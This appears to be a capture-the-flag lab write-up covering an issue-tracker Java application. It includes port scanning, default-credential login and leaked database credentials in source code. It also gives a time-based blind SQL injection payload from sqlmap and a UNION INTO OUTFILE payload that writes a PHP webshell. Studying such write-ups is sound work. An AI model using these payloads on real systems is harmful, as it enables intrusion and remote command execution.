$ nmap -p- --min-rate 3000 -Pn 192.168.157.147
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-14 12:15 +08
Warning: 192.168.157.147 giving up on port because retransmission cap hit (10).
Stats: 0:03:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 85.65% done; ETC: 12:19 (0:00:35 remaining)
Nmap scan report for 192.168.157.147
Host is up (0.17s latency).
Not shown: 65481 filtered tcp ports (no-response), 50 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
17445/tcp open unknown
30455/tcp open unknown
50080/tcp open unknown
We can login with admin:admin. There, we see an issuetracker.zip file:
We can download this to our Kali machine and unzip it. This would reveal source code for a website.
$ ll
total 32
-rw-r--r-- 1 kali kali 1495 Feb 2 2021 HELP.md
-rwxr-xr-x 1 kali kali 10070 Feb 2 2021 mvnw
-rw-r--r-- 1 kali kali 6608 Feb 2 2021 mvnw.cmd
-rw-rw-r-- 1 kali kali 2248 Feb 5 2021 pom.xml
drwxr-xr-x 4 kali kali 4096 Feb 2 2021 src
Source Code Analysis -> SQLI RCE
The source code was in Java and for the application running on port 17445. I looked thorugh the files and found this within src/main/java/com/issue/tracker/issues/IssueController.java:
@GetMapping("/issue/checkByPriority")publicStringcheckByPriority(@RequestParam("priority") String priority,Model model) {// // Custom code, need to integrate to the JPA//Properties connectionProps =newProperties();connectionProps.put("user","issue_user");connectionProps.put("password","ManagementInsideOld797");try { conn =DriverManager.getConnection("jdbc:mysql://localhost:3306/issue_tracker",connectionProps);String query ="SELECT message FROM issue WHERE priority='"+priority+"'";System.out.println(query);Statement stmt =conn.createStatement();stmt.executeQuery(query);
This bit of code here gave us credentials, and also is vulnerable to SQL injection since the priority variable is not sanitsed before being passed in. I registed a user on the machine, and then proceeded to test the SQL Injection using sqlmap:
$ sqlmap -r req
---
Parameter: priority (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: priority=' AND (SELECT 3165 FROM (SELECT(SLEEP(5)))JlSD) AND 'aCou'='aCou
---
Normally, this should be rather easy to write a webshell using a payload like this:
' union select '<?php system($_REQUEST['cmd']); ?>' into outfile '/srv/http/cmd.php' -- -
However I don't know the document root, and sqlmap brute force doesn't seem to work. I took a hint and realised that port 30445 was supposed to host phpinfo.php, but it was unresponsive.
I read the walkthrough and it shows that /srv/http is the document root taken from phpinfo.php, which would allow me to write a webshell to port 30445.